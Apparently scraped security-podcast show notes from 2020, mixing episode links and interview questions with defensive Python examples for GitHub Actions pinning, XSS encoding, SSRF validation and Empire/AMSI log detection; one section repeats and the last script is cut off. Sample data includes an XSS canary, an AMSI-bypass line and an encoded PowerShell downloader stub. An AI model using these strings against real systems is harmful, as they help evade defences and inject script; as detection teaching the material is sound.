People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep Thought: a cybersecurity novella: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
@modmasha
Published on: May 20, 2020
Masha Sedova - Founder, Elevate Security
Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we’ve accepted training completion and mock phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie?
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this newfound knowledge.
Study after study shows that the reason why people don’t do things is not always because they don’t understand, it’s because they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior.
Motivation Theory (Deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y: https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing
Pull data to see who is clicking on links
Send an ‘intervention’
Gotta move away from training
The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep Thought: a cybersecurity novella: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
@modmasha
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://pandora.app.link/p9AvwdTpT3
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: May 13, 2020
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/)
https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC:https://info.summit7systems.com/blog/cmmc
https://www.comptia.org/certifications/project - Project+
Cameron Smith = www.twitter.com/secnomancer
Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805
https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/
https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
Original B-Sides Talk Blurb
SITREP: A Consultant's Perspective from the Trenches of InfoSec
In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.
After my presentation is over, I want my audience to...
...so that ...
Security really isn't as complicated as most people think
Establish Credibility
Github actions - https://github.com/features/actions
How are these written?
It looks like a marketplace format? How do they maintain code quality?
What does it take to set up the actions?
It looks like IFTTT for DevOps?
What kind of integrations does it allow for? Will it handle logins or API calls for you?
Is it moderated in some way? What’s the acceptance criteria for these?
What are you trying to accomplish by using Github Actions?
What are the benefits of using these over XX product?
What is gained by using this?
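On the "marketplace" and "how do they maintain code quality" questions: a third-party action is code that runs with your repository's token, and the marketplace does not vet it for you. The check a practitioner wants is the one GitHub's own hardening guidance gives: pin every external action to a full commit SHA (tags and branches are mutable) and grant the token per-scope least privilege. Below is an added example, not from the episode or from GitHub, that scans a constructed workflow file for both problems. It is a line-oriented scan with the standard library rather than a YAML parser, and the sample workflow is made up.

```python
"""Flag unpinned third-party actions and over-broad token permissions.

Added example, not from the episode or from GitHub's tooling. Line-oriented
scan (no YAML dependency); the sample workflow is constructed.
"""
import re

SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request]
permissions: write-all
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - uses: some-org/setup-thing@main
      - uses: some-org/lint-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
      - run: make test
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*(?P<ref>\S+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")
PERMISSIONS_RE = re.compile(r"^\s*permissions:\s*(?P<value>\S+)\s*$")


def audit_workflow(text):
    """Return [(line_number, message)] for every risky line in a workflow."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if m:
            ref = m.group("ref")
            # Local actions live in this repo; docker:// images need a digest
            # policy of their own, which this scan does not cover.
            if ref.startswith("./") or ref.startswith("docker://"):
                continue
            action, _, version = ref.partition("@")
            if not version:
                findings.append((lineno, f"{action}: no ref at all"))
            elif not SHA_RE.match(version):
                findings.append((lineno, f"{action}: pinned to mutable ref '{version}', use a full commit SHA"))
            continue
        p = PERMISSIONS_RE.match(line)
        if p and p.group("value") == "write-all":
            findings.append((lineno, "GITHUB_TOKEN permissions: write-all; grant per-scope least privilege"))
    return findings


if __name__ == "__main__":
    for lineno, msg in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {lineno}: {msg}")
```

Note that `actions/checkout@v2` is flagged too: a first-party action on a tag is still a tag someone can move. The SHA pin is what answers "will it handle logins or API calls for you" honestly: yes, with whatever code sits at that ref when the job runs.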
Mention twitch Channel and when (join the mailing list)
Github actions “Twitch.tv/shehackspurple”
Coaching, Project Management, Scrum Management
Alice and Bob Learn Application Security - Wiley - Fall/Winter 2020
Links:
https://mailchi.mp/e2ab45528831/shehackspurple
https://twitter.com/shehackspurple
https://medium.com/@shehackspurple
https://www.youtube.com/shehackspurple
https://www.twitch.tv/shehackspurple
https://www.linkedin.com/in/tanya-janca
https://github.com/shehackspurple/
Published on: April 21, 2020
Brakesec contributor @Pwnysec on Twitter has created a new video highlighting the importance of testing for XSS in your environment, also:
Discusses the different types of XSS you can find (stored, reflected, and DOM)
Tools you can employ to find and detect XSS
Methods and ways to prevent it from happening
If you're into #bugbounties, this is a great primer to maximize your earning potential. Hope you enjoy!
https://youtu.be/GtCxPGwQpsU
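For the "detect" and "prevent" bullets, here is an added example (not code from the video or from @Pwnysec) showing why the fix depends on where untrusted input lands, and the core test a scanner runs: send a canary with metacharacters and see whether it comes back untouched. It covers the server-rendered cases (reflected and stored share the same output-encoding fix); DOM XSS happens in client-side JavaScript and is not addressed by server-side encoding. The canary and sample renderers are constructed.

```python
"""Context-aware output encoding for XSS, plus a reflection check.

Added example, not the video's code. Sample payloads are constructed.
"""
import html
import json

CANARY = '"><svg/onload=alert(1)>'   # constructed probe, breaks out of attr and tag


def render_unsafe(name):
    # Vulnerable on purpose: raw concatenation, the reflected/stored-XSS pattern
    return f"<p>Hello {name}</p>"


def render_body(name):
    # HTML text context: entity-encode & < > " '
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_attr(value):
    # Attribute context: encode AND always quote the attribute
    return f'<input value="{html.escape(value, quote=True)}">'


def render_js_string(value):
    # JavaScript string context inside <script>: JSON-encode (ensure_ascii
    # escapes non-ASCII such as U+2028), then neutralise "</" so a payload
    # cannot close the script element early.
    encoded = json.dumps(value).replace("</", "<\\/")
    return f"<script>var name = {encoded};</script>"


def reflects_unescaped(payload, response_body):
    """Core scanner test: if the canary's metacharacters survive in the
    response, that injection point is exploitable in that context."""
    return payload in response_body


if __name__ == "__main__":
    for fn in (render_unsafe, render_body, render_attr):
        print(fn.__name__, "reflects canary:", reflects_unescaped(CANARY, fn(CANARY)))
```

A single `escape()` is not a universal fix: `html.escape` is right for text and quoted attributes but does nothing for an unquoted attribute, a URL, or a script block, which is why the tools in the video probe each context separately.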
Published on: April 21, 2020
Tanya's AppSec Course
https://www.shehackspurple.dev/server-side-request-forgery-ssrf-defenses
https://www.shehackspurple.dev
Server-side request forgery - https://portswigger.net/web-security/ssrf
What are the differences between stored XSS and SSRF?
Does this require a MITM type of issue?
Doesn’t stored XSS get stored on the server?
What conditions must exist for SSRF to be possible?
What mitigations need to be in place for SSRF? CORS? CSP?
Would a WAF or mod_security be effective?
Can it be completely mitigated, or are there still ways around it?
Part 2 - next week
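The mitigation questions above have a short answer worth writing down: CORS and CSP are browser-enforced and do nothing for SSRF, because the request is made by the server itself; a WAF can block obvious payloads but cannot see what a hostname resolves to. The condition for SSRF is simply "the server fetches a URL an attacker influences". Below is an added example (not from the course or the episode) of the server-side validation that actually helps: scheme allowlist, optional host allowlist, resolve the name and reject loopback/private/link-local answers (including the 169.254.169.254 cloud metadata address), and re-validate on every redirect, which is where a "safe" URL usually turns internal. The resolver is injectable so it runs offline; the fake DNS table, sample URLs and fake fetcher are constructed.

```python
"""Validate a user-supplied URL before the server fetches it.

Added example, not from the course or episode. Standard SSRF defenses:
scheme allowlist, host allowlist, resolve-then-check the address, and
re-check each redirect. Fake DNS/fetch data below is constructed.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_with_dns(host):
    # Production resolver: every A/AAAA answer, not just the first one
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def _ip_is_public(ip):
    addr = ipaddress.ip_address(ip)
    # 169.254.169.254 (cloud metadata) is link-local; 127/8 loopback; RFC1918 private
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_url(url, resolver=resolve_with_dns, host_allowlist=None):
    """Return (ok, reason); ok only if every resolved address is public."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "no host"
    if parts.username or parts.password:
        return False, "userinfo in URL"          # http://trusted@internal/ tricks
    host = parts.hostname.lower()
    if host_allowlist is not None and host not in host_allowlist:
        return False, f"host {host!r} not in allowlist"
    try:
        addrs = {str(ipaddress.ip_address(host))}   # literal IP, IPv6 brackets already stripped
    except ValueError:
        try:
            addrs = resolver(host)                   # decimal/hex forms like 2130706433 end up here
        except OSError:
            return False, "resolution failed"
    if not addrs:
        return False, "no addresses"
    for ip in addrs:
        if not _ip_is_public(ip):
            return False, f"{host} resolves to non-public {ip}"
    return True, "ok"


def follow_redirects(url, fetch, resolver=resolve_with_dns, max_hops=3):
    """Fetch with redirects handled by hand so each hop is re-validated.
    fetch(url) -> (status, headers, body); the real client must have
    automatic redirects switched off or this check is bypassed."""
    for _ in range(max_hops + 1):
        ok, reason = check_url(url, resolver)
        if not ok:
            return None, reason
        status, headers, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and "location" in headers:
            url = headers["location"]
            continue
        return body, "ok"
    return None, "too many redirects"


# ---- constructed data so the example runs offline ----
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "rebind.test": {"93.184.216.34", "10.0.0.5"},   # one public, one internal answer
    "metadata.test": {"169.254.169.254"},
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN")
    return FAKE_DNS[host]


def fake_fetch(url):
    # A public-looking URL that redirects to the metadata service
    if url == "http://example.com/report":
        return 302, {"location": "http://169.254.169.254/latest/meta-data/"}, b""
    return 200, {}, b"public content"


if __name__ == "__main__":
    for u in ("http://example.com/x", "http://rebind.test/x", "file:///etc/passwd",
              "http://127.0.0.1:8080/admin"):
        print(u, check_url(u, fake_resolver))
    print(follow_redirects("http://example.com/report", fake_fetch, fake_resolver))
```

On "can it be completely mitigated": a host allowlist gets closest, but even then resolve-and-check matters, because the allowed host's DNS can change between the check and the request (the `rebind.test` case models the mixed answer). Pinning the checked address for the actual connection closes that gap.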
Tanya Janca
Published on: April 14, 2020
April Mardock - CISO - Seattle Public Schools
Jared Folkins - IT Engineer - Bend La Pine Schools
Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/
Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters
https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security people at educational institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets?
Is money/budget the reason schools get the raw deal here?
Why is ransomware such an appealing attack?
How complex is the school environment?
Mobile, tablets, hostile users, hostile external forces
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
https://www.edweek.org/ew/articles/2019/09/10/parent-who-criticized-his-sons-math-program.html
When students, the people you are trying to educate, are found doing something inappropriate, how do districts handle it?
https://ktvz.com/news/2017/11/08/mtn-view-hs-bomb-threat-traced-to-eugene-14-year-old/
What challenges do Security people in education face when partnering with their user base?
Unlike a corporate setting, many educators and students need to install different software throughout the year, how is that handled?
How did April, Nathan, and Jared meet?
Has the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud based, or do you still have an IT shack at the school systems with physical machines?
Local admin rights are not granted… (excellent!)
Published on: April 7, 2020
Published on: March 29, 2020
https://twitter.com/AlyssaM_InfoSec/status/1159877471161839617?s=19
Looking forward to sharing my vision for ending the 60 year cycle of bad defense strategies in #infosec and my challenge to think about security in a more effective way. https://sched.co/TAqU
#DianaInitiative2019 #cdwsocial
1961 - MIT - CTSS - https://en.wikipedia.org/wiki/Compatible_Time-Sharing_System
Egg, coconut, brick (my example of security --brbr)
Start with critical assets
Layer outward, not perimeter in.
Medieval castles
Create the keep, build out from that
Active defenses
Dover Castle - https://en.wikipedia.org/wiki/Dover_Castle#/media/File:1_dover_castle_aerial_panorama_2017.jpg
Detection defenses - watch guards
Mitigation defenses - moats - give time/space to respond (network segmentation)
Active countermeasures - knights/archers/cannons
DeepFake technology
Election year
Spoke at RSA
Business threat?
“Outsider trading”
“Video of Elon talking about problems - fake…”
Stocks tank - short
https://www.vice.com/en_us/article/ywyxex/deepfake-of-mark-zuckerberg-facebook-fake-video-policy
Could it be done strategically to destabilize things
Extort business leaders
Fake videos used to extort
Still difficult to create
What are the hurdles stopping it from being mainstream?
Huge render farms?
https://www.youtube.com/watch?v=18LN7VQM1aw - deepfake Sharon Stone/ Steve Buscemi
Threat modeling in devSecOps
Agile env needs to be quick, fast, and
Build it into user stories
Shostack’s method is a bit weighty
How do we implement that in such a way to make dev want to do them?
Organizing Virtual cons
https://Allthetalks.online - April 15
24 hour conference for charity
Talks, followed by interactive channels, community generation
Virtual Lobbycon
Comedian
CFP is open 01 April 2020
Sticker swap!
Bsides Atlanta
27-29 March
https://bsidesatl.org/ - All virtual this weekend!
Infosec Oasis
https://Infosecoasis.com - 18 April
https://mashable.com/article/zoom-conference-call-work-from-home-privacy-concerns/
Published on: March 25, 2020
TrustedSec
Released SEToolkit, Pentester Framework (PTF)
PoC release for the “Shitrix” Citrix ADC bug (TrustedSec released its PoC after the “Project Zero India” group, which is not affiliated with Google, had published theirs)
Jeff Snover, Lee Holmes - Powershell gods
Tools that are released get used by the ‘bad guys’
Shared tooling makes it harder to fingerprint actors, i.e. to tell whether they are who they appear to be (“Fuzzy Weasel vs. Psycho Toads”)
Withholding tools makes the bad guys’ job harder: they have to write the PoC themselves (presumably most bad actors are script kiddies)
Arguments for release
Released tools let the blue team learn the technique, and let SIEM/logging systems be tuned to recognize it
Learning how something was created, being able to break down the vulnerability
https://www.bleepingcomputer.com/news/security/new-evasion-encyclopedia-shows-how-malware-detects-virtual-machines/
Show #2:
DerbyCon - tell us about it
Dave Kennedy Center for Gaming and Leadership https://twitter.com/hackingdave/status/1220150360779710464?lang=en
PowerShell Empire is re-released by BC Security (Empire 3.0), ported to Python 3:
https://twitter.com/BCSecurity1/status/1209126652300709888
Initial tweet:
https://twitter.com/taosecurity/status/1209132572128747520
“We believe that Powershell and Empire framework will remain a major threat vector employed by APTs, malware authors, and Red Teams.” SO WHY ARE YOU UPDATING IT? You are improving capabilities you explicitly say are *used by bad guys.* Scottie, beam me up from this bizarro world.
https://twitter.com/taosecurity/status/1209287582439395330
Nope. One example: Iranian APT “CopyKittens” uses Powershell Empire. Incidentally, I found this example via
. https://clearskysec.com/tulip/
https://twitter.com/michael_yip/status/1209151868036886528
One can innovate without sharing with the adversary no? It’s literally how the defense industry work or am I missing something?
https://twitter.com/michael_yip/status/1209247219796398083
… “Are we really justifying lowering the R&D cost of the adversary is the only way to attract talent to the defensive side. Not to mention - no one is saying developing OST is wrong. It’s the way they're being shared that’s problematic”
https://twitter.com/2sec4u/status/1209169724799623169?s=20
The whole idea is that actors can't just git clone an advanced post exploitation framework which bypasses 95% of organisations defences. It should cost actors time & money to bypass these defences but because red team keep releasing new stuff with bypasses... the cycle continues.
https://twitter.com/IISResetMe/status/1209180945011621889?s=20
I really _want_ to agree. ... but I also work in an org with million dollar budgets, a dozen full-time detection engineers and analysts and an army of devs and sysadmins, and even we are having a hard time keeping up - how does this arms race "help" non-F500 orgs?
(later discussion does mention that he has a hard time seeing it as net negative) https://twitter.com/IISResetMe/status/1209183774182907904?s=20
https://twitter.com/cnoanalysis/status/1209169633460150272?s=20
“If we don’t create the offensive tools then the bad guys will!” That is a terrible argument for OST release. “We might as well do something that harms because someone else will do that eventually anyway...” there are so many logical fallacies I don’t have enough space
https://twitter.com/r3dQu1nn/status/1209207550731677697
Limiting yourself by not exposing more tooling to defenders is NOT how to improve security. Yikes. The more exposure you provide defenders gives you more detection's/IOC's you can build to help defend against APT's. That's the whole point of Proactive security.
https://twitter.com/bettersafetynet/status/1209138002473160707
It's vital that we continue to sharpen our swords. The commoditization of attacker techniques allows better defense against what adversaries are doing.
https://twitter.com/dragosr/status/1209213064446279680
And this whole discussion ignores a simple fact that released information is way better than exploits passed around quietly or kept in stockpile caches regardless of anyone’s metric of responsibility (which is a debatable, very hypothetical line of what’s acceptable or not).
https://twitter.com/bettersafetynet/status/1209139099979923457
The very fact that you and others who are taking this side are trying to cajole and brow beat to this position shows how weak your argument is. MITRE ATT&CK took off like gang-busters not because they had a better trolling game, but because it was a great idea implemented well.
https://twitter.com/bettersafetynet/status/1209139578579275776
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/bettersafetynet/status/1209154592560353280
My stance is likely to tick off both sides here. I think there are times that limited release is good. But over and over, we've seen where vendors do not change until something is publicly released.
https://twitter.com/r3dQu1nn/status/1209346356151631873
Security is a service that can be improved with products. Having no security or limiting exposure to offensive tool sets increases the chances of a breach. Ethical hackers sole purpose is to help make Blue better. Which is why purple teams are a great resource for any company.
https://twitter.com/ippsec/status/1209354476072689664?s=20
To the people upset by public red team tools. If you cant detect open source tools than what chance do you have at detecting private one off tools. It’s much easier to automate a battle against 100 duck sized horses than it is to face off against a single horse sized duck.
https://www.bc-security.org/post/the-empire-3-0-strikes-back
Is there a way to protect against it?
Where does this sit in the ATT&CK Matrix?
Features:
Enhanced Windows Evasion vs. Defender
DPAPI support for “PSCredential” and “SecureString”
AMSI bypasses
JA3/S signature Randomization
New Mimikatz version integration
Curveball test (CryptoAPI test scripts)
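On "is there a way to protect against it" and "where does this sit in ATT&CK": the launcher is Command and Scripting Interpreter: PowerShell (T1059.001) and the AMSI bypass is Impair Defenses (T1562.001), and the durable control is PowerShell script block logging (Event ID 4104) plus process command lines, because the decoded script is visible there whatever the stager looked like on the wire. The added example below (not from the episode or from BC Security) decodes a `-enc` UTF-16LE launcher and matches a few well-known Empire and AMSI-bypass strings over constructed log entries. The indicator list is illustrative only: the "enhanced evasion" feature above exists precisely to mangle such strings, so treat literal matches as the floor and the encoded-command-plus-downloader behaviour as the more durable signal.

```python
"""Spot Empire-style PowerShell launchers and AMSI-bypass strings in logs.

Added example, not from the episode or BC Security. Events are constructed
4688 (process command line) and 4104 (script block) entries; the indicator
list is illustrative, not exhaustive.
"""
import base64
import re

_STAGER = "[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient"

# Constructed sample events: (event id, text)
SAMPLE_EVENTS = [
    ("4688", "powershell.exe -NoP -sta -w 1 -enc "
             + base64.b64encode(_STAGER.encode("utf-16-le")).decode()),
    ("4104", "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"),
    ("4104", "Get-ChildItem C:\\Users | Sort-Object Length"),
    ("4688", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]

# -e/-ec/-enc/-encodedcommand followed by a base64 blob (PowerShell accepts any prefix)
ENC_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

INDICATORS = [
    ("amsi_bypass", re.compile(r"(?i)AmsiUtils|amsiInitFailed|AmsiScanBuffer")),
    ("empire_launcher_flags", re.compile(r"(?i)-nop\b.*-sta\b.*-w\s+1\b")),   # classic Empire stub
    ("downloader", re.compile(r"(?i)Net\.WebClient|DownloadString|Expect100Continue")),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE) or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(text):
    """Match indicators against the raw text and, if present, the decoded payload."""
    hits = set()
    decoded = decode_encoded_command(text)
    surfaces = [text] + ([decoded] if decoded else [])
    for name, rx in INDICATORS:
        if any(rx.search(s) for s in surfaces):
            hits.add(name)
    if decoded is not None:
        hits.add("encoded_command")
    return sorted(hits)


def triage(events):
    return [(event_id, analyze(text)) for event_id, text in events]


if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits or "-")
```

The fourth event shows the expected false-positive boundary: `-ExecutionPolicy Bypass -File` is noisy but legitimate admin tooling and matches nothing here, whereas an encoded command that decodes to a WebClient download is worth an alert on its own, Empire or not.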
Dave’s new Esport initiative (opens in February): https://twitter.com/HackingDave/status/1220150360779710464
DERBYCON community updates
Published on: March 19, 2020TrustedSec
Released SEToolkit, Pentester Framework (PTF)
PoC release for “Shitrix” bug (was disclosed after Google zero initiative India group)
Jeff Snover, Lee Holmes - Powershell gods
Tools are released are utilized by the ‘bad guys’
Tooling makes it more difficult to fingerprint who are who they say they are “Fuzzy Weasel Vs. Psycho Toads”
Makes the bad guys job harder by making them have to create the PoC (presumably most bad actors are skids)
Arguments for release
Tools allow for teaching Blue team, and SIEM/logging systems to understand
Learning how something was created, being able to break down the vulnerability
https://www.bleepingcomputer.com/news/security/new-evasion-encyclopedia-shows-how-malware-detects-virtual-machines/
Show #2:
DerbyCom - Tell us about it
Dave Kennedy Center for gaming and Leadship https://twitter.com/hackingdave/status/1220150360779710464?lang=en
Powershell is re-released, using Python:
https://twitter.com/BCSecurity1/status/1209126652300709888
Initial tweet:
https://twitter.com/taosecurity/status/1209132572128747520
“We believe that Powershell and Empire framework will remain a major threat vector employed by APTs, malware authors, and Red Teams.” SO WHY ARE YOU UPDATING IT? You are improving capabilities you explicitly say are *used by bad guys.* Scottie, beam me up from this bizarro world.
https://twitter.com/taosecurity/status/1209287582439395330
Nope. One example: Iranian APT “CopyKittens” uses Powershell Empire. Incidentally, I found this example via
. https://clearskysec.com/tulip/
https://twitter.com/michael_yip/status/1209151868036886528
One can innovate without sharing with the adversary no? It’s literally how the defense industry work or am I missing something?
https://twitter.com/michael_yip/status/1209247219796398083
… “Are we really justifying lowering the R&D cost of the adversary is the only way to attract talent to the defensive side. Not to mention - no one is saying developing OST is wrong. It’s the way they're being shared that’s problematic”
https://twitter.com/2sec4u/status/1209169724799623169?s=20
The whole idea is that actors can't just git clone an advanced post exploitation framework which bypasses 95% of organisations defences. It should cost actors time & money to bypass these defences but because red team keep releasing new stuff with bypasses... the cycle continues.
https://twitter.com/IISResetMe/status/1209180945011621889?s=20
I really _want_ to agree. ... but I also work in an org with million dollar budgets, a dozen full-time detection engineers and analysts and an army of devs and sysadmins, and even we are having a hard time keeping up - how does this arms race "help" non-F500 orgs?
(later discussion does mention that he has a hard time seeing it as net negative) https://twitter.com/IISResetMe/status/1209183774182907904?s=20
https://twitter.com/cnoanalysis/status/1209169633460150272?s=20
“If we don’t create the offensive tools then the bad guys will!” That is a terrible argument for OST release. “We might as well do something that harms because someone else will do that eventually anyway...” there are so many logical fallacies I don’t have enough space
https://twitter.com/r3dQu1nn/status/1209207550731677697
Limiting yourself by not exposing more tooling to defenders is NOT how to improve security. Yikes. The more exposure you provide defenders, the more detections/IOCs you can build to help defend against APTs. That's the whole point of proactive security.
https://twitter.com/bettersafetynet/status/1209138002473160707
It's vital that we continue to sharpen our swords. The commoditization of attacker techniques allows better defense against what adversaries are doing.
https://twitter.com/dragosr/status/1209213064446279680
And this whole discussion ignores a simple fact that released information is way better than exploits passed around quietly or kept in stockpile caches regardless of anyone’s metric of responsibility (which is a debatable, very hypothetical line of what’s acceptable or not).
https://twitter.com/bettersafetynet/status/1209139099979923457
The very fact that you and others who are taking this side are trying to cajole and browbeat to this position shows how weak your argument is. MITRE ATT&CK took off like gangbusters not because they had a better trolling game, but because it was a great idea implemented well.
https://twitter.com/bettersafetynet/status/1209139578579275776
It's odd that those who advocate this position point out these reports while ignoring all the vendor patches, all the hardening guidelines, basically all the technical defensive work that ops teams do. Nobody's doubting attackers use these techniques, we doubt your conclusions.
https://twitter.com/bettersafetynet/status/1209154592560353280
My stance is likely to tick off both sides here. I think there are times that limited release is good. But over and over, we've seen where vendors do not change until something is publicly released.
https://twitter.com/r3dQu1nn/status/1209346356151631873
Security is a service that can be improved with products. Having no security or limiting exposure to offensive tool sets increases the chances of a breach. Ethical hackers' sole purpose is to help make Blue better. Which is why purple teams are a great resource for any company.
https://twitter.com/ippsec/status/1209354476072689664?s=20
To the people upset by public red team tools: if you can't detect open source tools, then what chance do you have at detecting private one-off tools? It’s much easier to automate a battle against 100 duck-sized horses than it is to face off against a single horse-sized duck.
https://www.bc-security.org/post/the-empire-3-0-strikes-back
Is there a way to protect against it?
Where does this sit in the ATT&CK Matrix?
Features:
Enhanced Windows Evasion vs. Defender
DPAPI support for “PSCredential” and “SecureString”
AMSI bypasses
JA3/S signature Randomization
New Mimikatz version integration
Curveball test (CryptoAPI test scripts)
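On the question of protecting against it: whichever Empire build an attacker runs, the common AMSI bypasses leave recognisable literals behind in PowerShell script block logging (Event ID 4104) and in process command lines, and that is something most shops can watch for today. The script below is an added illustration for these notes, not code from Empire, BC-Security or the show; the event records it runs over are constructed, and the field names (RecordId, EventID, ScriptBlockText, CommandLine) are assumed to be what a SIEM would normalise out of the Windows PowerShell Operational and Sysmon/Security logs. In ATT&CK terms this is T1562.001 (Impair Defenses: Disable or Modify Tools) reached through T1059.001 (PowerShell).

```python
"""Flag AMSI-tampering indicators in PowerShell script-block and process-creation events.

Added illustration for these show notes; not code from Empire or BC-Security.
Event dicts mimic SIEM-normalised Windows PowerShell Operational (EventID 4104)
and Sysmon/Security process-creation (EventID 1 / 4688) records. Field names
and the sample records are constructed for this example.
"""
import base64
import re

# Literals that the widely published AMSI bypass families leave in script text:
# reflective access to System.Management.Automation.AmsiUtils and its
# amsiInitFailed field, or patching AmsiScanBuffer inside amsi.dll.
AMSI_INDICATORS = {
    "AmsiUtils type lookup": re.compile(r"AmsiUtils", re.IGNORECASE),
    "amsiInitFailed field": re.compile(r"amsiInitFailed", re.IGNORECASE),
    "AmsiScanBuffer reference": re.compile(r"AmsiScanBuffer", re.IGNORECASE),
    "amsi.dll reference": re.compile(r"amsi\.dll", re.IGNORECASE),
}

# -EncodedCommand (and the -e / -enc abbreviations) followed by a base64 blob.
ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_command(script):
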